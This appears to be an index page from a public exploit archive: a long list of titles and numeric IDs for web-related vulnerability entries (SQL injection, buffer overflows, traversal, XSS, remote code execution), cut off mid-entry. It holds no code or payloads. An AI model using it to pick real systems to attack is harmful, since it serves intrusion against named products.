FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure [19842] TalentSoft Web+ 4.x Directory Traversal Vulnerability [19810] Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow [19809] Oracle Web Listener 4.0 .x for NT Batch File Vulnerability [19790] webpagetest <= 2.6 - Multiple Vulnerabilities [19753] ms frontpage personal webserver 1.0/personal web server 4.0 - Directory Traversal [19747] Zeus Web Server 3.x Null Terminated Strings Vulnerability [19730] A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability [19714] Netsweeper WebAdmin Portal Multiple Vulnerabilities [19702] BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow [19695] Michael Lamont Savant WebServer 2.0 NULL Character DoS Vulnerability [19691] Tony Greenwood WebWho+ 1.1 - Remote Command Execution Vulnerability [19682] Netscape Enterprise Server ,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities [19639] Alt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability [19632] Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability [19629] Webmatic 3.1.1 - Blind SQL Injection [19623] International TeleCommunications WebBBS 2.13 login & password Buffer Overflow [19574] Webify Link Directory SQL Injection [19567] National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure [19540] t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal vulnerability [19446] WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability [19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability [19431] webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability [19406] symantec web gateway 5.0.2.8 - Multiple Vulnerabilities [19400] WordPress Website FAQ Plugin 1.0 - SQL Injection [19380] Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS Vulnerability [19299] SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty [19293] Sysax <= 5.62 Admin Interface Local Buffer Overflow [19292] iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites [19225] Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability [19224] Computalynx CMail 2.3 Web File Access Vulnerability [19223] Floosietek FTGate 2.1 Web File Access Vulnerability [19222] Gordano NTMail 4.2 Web File Access Vulnerability [19221] SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability [19212] Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities [19178] webo site speedup <= 1.6.1 - Multiple Vulnerabilities [19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability [19147] NT IIS4 Remote Web-Based Administration Vulnerability [19135] Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities [19134] Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities [19133] Cells Blog CMS 1.1 - Multiple Web Vulnerabilites [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [19076] Apple Personal Web Sharing 1.1 Vulnerability [19065] Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection [19038] Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability [19031] Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability [19011] Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability [18955] Simple Web Content Management System 1.1-1.3 - Multiple SQL Injection [18942] Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability [18934] WeBid converter.php Remote PHP Code Injection [18932] Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow [18857] Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure [18840] Fortinet FortiWeb Web Application Firewall Policy Bypass [18832] Symantec Web Gateway Cross Site Scripting [18824] Websense Triton Multiple Vulnerabilities [18806] Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS [18802] C4B XPhone UC Web 4.1.890S R1 XSS Vulnerability [18797] WebCalendar 1.2.4 Pre-Auth Remote Code Injection [18787] Wordpress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities [18775] WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution [18763] Liferay 6.0.x Webdav File Reading Vulnerability [18687] Landshop 0.9.2 - Multiple Web Vulnerabilities [18665] PHP 5.4.0 Built-in Web Server DoS PoC [18634] Dell Webcam CrazyTalk ActiveX BackImage Vulnerability [18621] Dell Webcam Software Bundled ActiveX Remote Buffer Overflow Vulnerability [18575] RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages) [18571] promise webpam 2.2.0.13 - Multiple Vulnerabilities [18556] Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities [18536] WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages) [18523] webgrind 1.0 (file param) Local File Inclusion Vulnerability [18520] Sun Java Web Start Plugin Command Line Argument Injection (2012) [18512] Unity 3D Web Player <= 3.2.0.61061 Denial of Service [18510] webcamxp and webcam 7 - Directory Traversal vulnerability [18456] Achievo 1.4.3 - Multiple Web Vulnerabilities [18451] Sphinix Mobile Web Server 3.1.2.47 Multiple Persistent XSS Vulnerabilities [18447] MailEnable Webmail Cross-Site Scripting Vulnerability [18446] Webkit Normalize Bug - Android 2.2 [18416] stoneware webnetwork6 - Multiple Vulnerabilities [18407] AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload [18401] Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter) [18367] XAMPP WebDAV PHP Upload [18335] MangosWeb SQL Injection Vulnerability [18322] TinyWebGallery 1.8.3 - Remote Command Execution [18293] Akiva WebBoard 8.x SQL Injection Vulnerability [18260] Barracuda Control Center 620 - Multiple Web Vulnerabilities [18249] appRain CMF 0.1.5 - Multiple Web Vulnerabilities [18247] Capexweb 1.1 - SQL Injection Vulnerability [18240] CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow [18202] Meditate Web Content Editor 'username_input' SQL-Injection vulnerability [18121] FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution [18117] Authenex A-Key/ASAS Web Management Control 3.1.0.2 (latest) - Time-based SQL Injection [18070] Web File Browser 0.4b14 File Download Vulnerability [18051] BroadWin WebAccess SCADA/HMI Client Remote Code Execution [18012] Metasploit 4.1.0 Web UI stored XSS Vulnerability [17993] Apple Safari Webkit libxslt Arbitrary File Creation [17963] atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities [17933] "DivX Plus Web Player ""file://"" Buffer Overflow Vulnerability PoC" [17867] Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion [17861] Wordpress AllWebMenus Plugin 1.1.3 - Remote File Inclusion [17813] Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities [17786] Webmobo WB News System Blind SQL Injection [17785] TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption) [17772] BroadWin WebAccess Client Multiple Vulnerabilities [17708] Web Solutions Wcs2u SQL Injection Vulnerability [17635] HP JetDirect PJL Interface Universal Path Traversal [17581] MyWebServer 1.0.3 - Arbitrary File Download [17580] MyWebServer 1.0.3 - Denial of Service [17578] MinaliC Webserver 2.0 - Remote Source Disclosure [17577] SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC [17533] Inscribe Webmedia SQL Injection Vulnerability [17500] LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability [17487] WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit [17444] Webcat Multiple Blind SQL Injection Vulnerabilities [17438] IBM Web Application Firewall Bypass [17408] WeBid 1.0.2 persistent XSS via SQL Injection [17404] IBM WebSphere Application Server 7.0.0.13 CSRF Vulnerability [17396] Opera Web Browser 11.11 Remote Crash [17381] simple web-server 1.2 - Directory Traversal [17361] Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter) [17360] WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Command Injection [17359] Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit [17269] ICONICS WebHMI ActiveX Buffer Overflow [17240] ICONICS WebHMI ActiveX Stack Overflow [17237] Horizon Web Builder (fshow.php) SQL Injection Vulnerability [17204] DynMedia Pro Web CMS 4.0 - Local File Disclosure [17203] Web2Project 2.3 - SQL Injection Vulnerability [17198] 360 Web Manager 3.0 - Multiple Vulnerabilities [17192] docuFORM Mercury WebApp 6.16a/5.20 Multiple XSS Vulnerabilities [17180] Shape Web Solutions CMS SQL Injection Vulnerability [17125] Dream Vision Technologies Web Portal SQL Injection Vulnerability [17094] Allomani Web Links 1.0 - CSRF Vulnerability (Add Admin) [17063] easy file sharing web server 5.8 - Multiple Vulnerabilities [17057] webEdition CMS Local File Inclusion Vulnerability [17055] Honey Soft Web Solution Multiple Vulnerabilities [17054] webedition cms 6.1.0.2 - Multiple Vulnerabilities [17053] wodWebServer.NET 1.3.3 - Directory Traversal [17044] HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow [17043] HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow [17041] HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow [17036] Web Wiz Forum Injection Vulnerability [17030] HP NNM CGI webappmon.exe execvp Buffer Overflow [17029] HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow [16996] Fake Webcam 6.1 - Local Crash PoC [16993] ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution [16974] Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit [16959] Oracle WebLogic Session Fixation Via HTTP POST [16953] Luch Web Designer Multiple SQL Injection Vulnerabilities [16949] maian weblog <= 4.0 - Remote Blind SQL Injection [16939] Hiawatha WebServer 7.4 - Denial of Service Vulnerability [16935] bacula-web 1.3.x - 5.0.3 - Multiple Vulnerabilities [16923] ContentKeeper Web Remote Command Execution [16910] Mitel Audio and Web Conferencing Command Injection [16872] WebSTAR FTP Server USER Overflow [16804] Belkin Bulldog Plus Web Service Buffer Overflow [16802] Webster HTTP Server GET Buffer Overflow [16796] BEA Weblogic Transfer-Encoding Buffer Overflow [16793] Amlibweb NetOpacs webquery.dll Stack Buffer Overflow [16792] HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow [16791] MaxDB WebDBM GET Buffer Overflow [16776] Alt-N WebAdmin USER Buffer Overflow [16770] Savant 3.1 Web Server Overflow [16767] IA WebMail 3.x Buffer Overflow [16765] MaxDB WebDBM Database Parameter Overflow [16762] BEA WebLogic JSESSIONID Cookie Value Overflow [16758] SAP DB 7.4 WebTools Buffer Overflow [16753] Xitami 2.5c2 Web Server If-Modified-Since Overflow [16749] Microsoft RPC DCOM Interface Overflow [16697] IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow [16649] Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit [16641] SasCam Webcam Server 2.6.5 Get() method - Buffer Overflow [16635] activePDF WebGrabber ActiveX Control Buffer Overflow [16604] WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow [16585] Sun Java Web Start Plugin Command Line Argument Injection [16575] SAP AG SAPgui EAI WebViewer3D Buffer Overflow [16564] Internet Explorer WebViewFolderIcon setSlice() Overflow [16550] WebDAV - Application DLL Hijacker [16502] IBM Lotus Domino Web Access Upload Module Buffer Overflow [16495] Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit [16491] WinVNC Web Server <= 3.3.3r7 - GET Overflow [16471] Microsoft IIS WebDAV Write Access Code Execution [16470] Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow [16358] Microsoft IIS ISAPI RSA WebAgent Redirect Overflow [16314] Sun Java System Web Server WebDAV OPTIONS Buffer Overflow [16301] Firefox location.QueryInterface() Code Execution [16205] DIY Web CMS Multiple Vulnerabilities [16140] Web 2.0 Social Network Freunde Community SQL Injection Vunerability [16090] TinyWebGallery 1.8.3 - Multiple Vulnerabilities [16044] ab web cms 1.35 - Multiple Vulnerabilities [16042] Opera Web Browser 11.00 - Integer Overflow Vulnerability [15869] CA ARCserve D2D r15 Web Service Servlet Code Execution [15868] QuickPHP Web Server Arbitrary (src .php) File Download [15862] quickphp web server 1.9.1 - Directory Traversal [15837] Web@all <= 1.1 - Remote Admin Settings Change [15821] HttpBlitz Web Server Denial of Service Exploit [15790] PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection [15781] Inout Webmail Script Persistent XSS Vulnerability [15744] Gitweb <= 1.7.3.3 - Cross Site Scripting [15723] FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit [15688] HotWebScripts HotWeb Rentals (resorts.asp) SQL injection [15631] HP LaserJet Directory Traversal in PJL Interface [15629] MicroNetSoft RV Dealer Website search.asp, showAlllistings.asp SQL Injection [15617] VMware 2 Web Server - Directory Traversal [15567] WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion Vulnerability [15553] BPConferenceReporting Web Reporting Authentication Bypass Vulnerability [15548] Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit [15544] Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability [15517] Webmatic (index.php) SQL Injection Vulnerability [15482] Qtweb Browser 3.5 - Buffer Overflow Vulnerability [15387] Webmedia Explorer 6.13.1 Stored Cross Site Scripting Vulnerability [15373] mongoose web server 2.11 - Directory Traversal vulnerability [15336] MinaliC Webserver 1.0 - Remote Source Disclosure/File Download [15334] MinaliC Webserver 1.0 - Denial of Service Vulnerability [15333] MinaliC Webserver 1.0 - Directory Traversal Vulnerability [15290] Oracle Sun Java System Web Server - HTTP Response Splitting [15268] WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability [15239] WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability [15219] xWeblog 2.2 - (arsiv.asp tarih) SQL Injection Exploit [15218] xWeblog 2.2 - (oku.asp?makale_id) SQL Injection Vulnerability [15207] Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion Vulnerability [15153] Webspell 4.x - safe_query Bypass Vulnerability [15152] Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability [15151] Webspell 4.2.1 asearch.php SQL Injection Vulnerability [15098] FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution [15046] Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability [14976] YOPS Web Server Remote Command Execution [14967] Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption [14943] moaub #8 - sirang web-based d-control Multiple Vulnerabilities [14925] weborf <= 0.12.2 - Directory Traversal vulnerability [14919] Micronetsoft Rental Property Management Website SQL Injection Vulnerability [14916] MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution [14914] Micronetsoft RV Dealer Website SQL Injection Vulnerability [14848] Web-Ideas Web Shop Standard SQL Injection Vulnerability [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [14528] APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability [14447] Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6) [14427] Outlook Web Access 2003 CSRF Vulnerability [14375] Pre Dynamic Institution Web Authentication Bypass [14374] Pre Web Host System Authentication Bypass [14367] Novell Groupwise Webaccess Stack Overflow [14316] PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit [14287] Sun Java Web Server 7.0 u7 - Exploit with DEP bypass [14285] Outlook Web Access 2007 CSRF Vulnerability [14256] HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH) [14254] EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard) [14237] IBM Bladecenter Management - Multiple web application vulnerabilities [14225] Bs Realtor_Web Script SQL Injection Vulnerability [14224] Bs Recipes_Website Script SQL Injection/Auth Bypass Vulnerability [14217] WikiWebHelp 0.28 - SQL Injection Vulnerability [14195] SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite [14194] Sun Java Web Server 7.0 u7 Remote Exploit [14160] InterScan Web Security 5.0 Permanent XSS [14144] Specialist Bed and Breakfast Website SQL Injection Vulnerability [14132] webERP 3.11.4 - Multiple Vulnerabilities [14123] WebDM CMS SQL Injection Vulnerability [14020] 2DayBiz - The Web Template Software SQL injection and XSS vulnerability [14012] Weborf HTTP Server Denial of Service Vulnerability [14006] InterScan Web Security 5.0 - Local Privilege Escalation [14004] InterScan Web Security 5.0 - Arbitrary File Upload [14001] InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download [13975] Webring Script SQL Injection Vulnerability [13955] Joomla Template BizWeb com_community Persistent XSS Vulnerability [13938] WebsiteBaker 2.8.1 CSRF Proof of Concept [13920] H264WebCam Boundary Condition Error [13866] Joke Website Script SQL Injection and Cross-Site Scripting Vulnerabilities [13850] Litespeed Technologies Web Server Remote Poison null byte Exploit [13842] VU Web Visitor Analyst Authentication Bypass [13816] Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection [13788] Web Wiz Forums 9.68 SQLi Vulnerability [13779] Pre Web Host - SQL Injection Vulnerability [13750] WebBiblio Subject Gateway System LFI Vulnerability [13735] OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7 [12867] clickartweb Design SQL Injection Vulnerability [12861] PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability [12852] QtWeb 3.3 - Remote DoS/Crash Exploit [12815] GoAheaad Webserver Source Code Disclosure Vulnerability [12798] Webiz - SQL Injection Vulnerability [12797] Webiz - Local Shell Upload Vulnerability [12791] Aim Web Design Multiple Vulnerabilities [12788] Marketing Web Design Multiple Vulnerabilities [12776] Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability [12772] Realtor WebSite System E-Commerce SQL Injection Vulnerability [12761] GlobalWebTek Design SQL Injection Vulnerability [12754] Easy Address book Webserver 1.2 CSRF [12750] RapidWareX 2.0.1 - (WebUI) CSRF Exploit [12744] Webit Cms SQL Injection Vulnerability [12743] web5000 (page_show) SQL Injection Vulnerability [12740] POC - SEH control (0day) of Webby webserver [12736] Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability [12735] NITRO Web Gallery SQL Injection Vulnerability [12731] Webloader 8 - SQL Injection Vulnerability [12730] ProWeb Design SQL Injection Vulnerability [12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability [12724] WebAsys blindSQL-inj exploit [12722] interuse Website Builder & design (index2.php) SQL Injection Vulnerability [12717] Telia Web Design (index.php) SQL Injection Vulnerability [12710] Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) - Kernel Mode Local Priv. Escalation [12709] webperformance Ecommerce SQL Vulnerability [12703] Recipes Website 1.0 - SQL Injection [12699] eWebEditor 1.x - (WYSIWYG) Remote File Upload [12674] webYourPhotos <= 6.05 - (index.php) Remote File Inclusion Vulnerability [12658] Web Administration Broken Access Control in McAfee Email Gateway [12655] QtWeb Browser 3.3 - DoS [12647] Webloader 7 - 8 (vid) SQL Injection Vulnerability [12644] WebJaxe SQL Injection [12640] Abyss Web Server X1 - CSRF [12631] Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability [12583] e-webtech (fixed_page.asp) SQL Injection Vulnerability [12582] zervit Web Server 0.4 - Directory Traversals [12581] zervit Web Server 0.4 - Source Disclosure/Download [12580] miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits [12571] e-webtech (page.asp) SQL Injection Vulnerability [12547] e-webtech (new.asp?id=) SQL Injection Vulnerability [12526] ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability [12522] WeBProdZ CMS SQL Injection Vulnerability [12515] Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability [12467] Webthaiapp detail.php(cat) Blind SQL Injection Vulnerability [12431] Webmoney Advisor ActiveX Remote DoS Exploit [12425] Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS [12401] WebKit <= 532.5 Stack Exhaustion [12387] webessence 1.0.2 - Multiple Vulnerabilities [12369] Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability [12359] Memorial Web Site Script Multiple Arbitrary Delete Vuln [12358] Memorial Web Site Script - Reset Password & Insecure Cookie Handling [12354] NKINFOWEB SQL Injection Exploit [12351] memorial web site script - (id) SQL Injection Vulnerability [12323] wb news (webmobo) 2.3.3 - Stored XSS [12309] Mongoose Web Server 2.8 - Multiple Directory Traversal Exploits [12295] N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability [12267] WebAdmin Shell Upload Vulnerability [12244] iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit [12166] Joomla Component Web TV com_webtv Local File Inclusion Vulnerability [12122] JAVA Web Start Arbitrary command-line injection [12114] miniature java web server <= 1.71 - Multiple Vulnerabilities [12111] Joomla Component Webee Comments Local File Inclusion Vulnerability [12095] Virata EmWeb R6.0.1 - Remote Crash Vulnerability [12033] Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting [12010] uTorrent WebUI <= 0.370 - Authorization header DoS Exploit [11999] Joomla Component webERPcustomer Local File Inclusion [11989] Faweb_2 Mullti Vulnerability [11974] HP OpenView NNM OvWebHelp.exe CGI Topic overflow [11906] Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities. [11903] Open Web Analytics 1.2.3 multi file include [11883] WebSiteBaker 2.8.1 DataBase Backup Disclosure [11831] WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability [11763] Embedthis Appweb 3.1.2 - Remote DoS [11689] Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection Vulnerability [11666] Uebimiau Webmail 3.2.0-2.0 - Email Disclosure [11661] SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit [11579] WebAdministrator Lite CMS SQL Injection Vulnerability [11574] iPhone WebCore::CSSSelector() Remote Crash Vulnerability [11569] Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities [11503] Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities [11497] gitWeb 1.5.2 - Remote Command Execution [11485] Multiple File Attachments Mail Form Pro 2.0 - WebShell upload [11430] southburn Web (products.php) SQL Injection Vulnerability [11427] Multiple Web Browser Vulnerabilities in Nokia Symbian OS 3rd Edition [11414] Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities [11368] Yes Solutions - Webapp SQL Injection [11316] GCP 2.0 datasets provided as BioCASE web services [11299] crownweb (page.cfm) SQL Injection Vulnerability [11295] eWebeditor ASP Version - Multiple Vulnerabilities [11264] South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation [11233] QtWeb 3.0 - Remote DoS/Crash Exploit [11212] eWebeditor Directory Traversal [11173] TrendMicro Web-Deployment ActiveX Remote Exec 0day PoC [11036] RoundCube Webmail Multiple Vulerabilities [10955] MasterWeb Script <= 1.0 - (details&newsID) SQL Injection Vulnerability [10942] Joomla Component com_cartweberp LFI Vulnerability [10871] Freewebscript'z Games (Auth Bypass) SQL Injection Vulnerability [10838] list Web (addlink.php id) Remote SQL Injection Vulnerability [10794] WEB Calendar Remote Database Disclosure Vulnerability [10733] com_webcamxp Cross Site Scripting Vulnerabilities [10717] DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability [10713] Esinti Web Design Gold Defter Database Disclosure Vulnerability [10675] Webring - Cross Site Scripting Vulnerability [10665] Jevonweb Guestbook Remote Admin Access Exploit [10638] Web Wiz Forums 9.64 - Database Disclosure Vulnerability [10637] Web Wiz NewsPad Database Disclosure Vulnerability [10585] webCocoon's simpleCMS SQL Injection Vulnerability [10583] social web cms <= beta 2 - Multiple Vulnerabilities [10555] Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability [10529] eWebquiz 8 - Blind SQL Injection Vulnerability [10516] Jobscript4Web 3.5 - Multiple CSRF Vulnerability [10434] Savant Web Server 3.1 - Remote Buffer Overflow Exploit [10398] ZeeCareers 2.x - PHP HR Manager Website [ XSS / Auth Bypass ] [10395] Miniweb 2.0 Full Path Disclosure [10349] CoreHTTP web server off-by-one buffer overflow vulnerability [10331] iWeb HTTP Server Directory Transversal Vulnerability [10225] MDaemon WebAdmin 2.0.x - SQL injection [10216] kr-web <= 1.1b2 - Remote File Inclusion Vulnerability [10171] Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day) [10094] IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting [10087] WebKit XML External Entity Information Disclosure Vulnerability [10086] WebKit 'Document()' Function Remote Information Disclosure Vulnerability [10081] Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability [9981] Websense Email Security xss [9980] Websense Email Security DoS [9970] South River Technologies WebDrive Service privilege escalation [9966] Serv-u web client 9.0.0.5 buffer overflow [9956] Palm Pre WebOS 1.1 DoS [9928] WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X) [9916] ContentKeeper Web Appliance < 125.10 Command Execution [9897] Mongoose Web Server 2.8.0 Source Disclosure [9877] DWebPro command injection [9874] Cherokee web server 0.5.4 DoS [9857] AfterLogic WebMail Pro 4.7.10 xss [9850] Xerox Fiery Webtools SQL Injection [9829] nginx 0.7.61 WebDAV directory traversal [9813] Mereo Web Server 1.8 - Remote Source Code Disclosure [9800] Serv-u web client 9.0.0.5 buffer overflow [9694] NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability [9676] BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability [9675] HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln [9657] httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit [9650] Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2 [9644] Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit [9643] kolibri+ webserver 2 - Directory Traversal vulnerability [9638] Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability [9621] Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability [9500] NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit [9493] Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln [9454] Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC [9429] EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC [9411] Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC [9344] Multi Website 1.5 (index php action) SQL Injection Vulnerability [9339] Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Vulnerabilities [9338] Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities [9337] simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability [9335] TT Web Site Manager 0.5 (Auth Bypass) SQL Injection Vulnerability [9304] Epiri Professional Web Browser 3.0 - Remote Crash Exploit [9284] SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities [9224] MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit [9193] WebVision 2.1 (news.php n) Remote SQL Injection Exploit [9165] webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit [9164] webLeague 2.2.0 (install.php) Remote Change Password Exploit [9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC [9162] WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability [9160] Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all) [9116] AwingSoft Web3D Player (WindsPly.ocx) Remote BOF PoC [9106] citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities [9096] Sun One WebServer 6.1 JSP Source Viewing Vulnerability [9092] webasyst shop-script (bsql/xss) Multiple Vulnerabilities [8980] FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit [8979] FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities [8954] adaptweb 0.9.2 (lfi/sql) Multiple Vulnerabilities [8944] Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities [8939] phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit [8928] phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln [8878] Web Directory PRO Remote Database Backup Vulnerability [8876] Web Directory PRO (admins.php) Change Admin Password Exploit [8859] WebEyes Guest Book 3 - (yorum.asp mesajid) SQL Injection Vulnerability [8857] WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability [8846] ASMAX AR 804 gu Web Management Console Arbitrary Command Exec [8833] Linksys WAG54G2 Web Management Console Arbitrary Command Exec [8823] Webboard <= 2.90 beta - Remote File Disclosure Vulnerability [8810] WebMember 1.0 (formID) Remote SQL Injection Vulnerability [8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl) [8792] Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities [8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php) [8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) [8748] Realty Web-Base 1.0 (list_list.php id) SQL Injection Vulnerability [8742] KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability [8721] Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC [8717] ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit [8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability [8666] zervit webserver 0.4 - Directory Traversal / memory corruption PoC [8649] TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit [8648] RTWebalbum 1.0.462 (AlbumID) 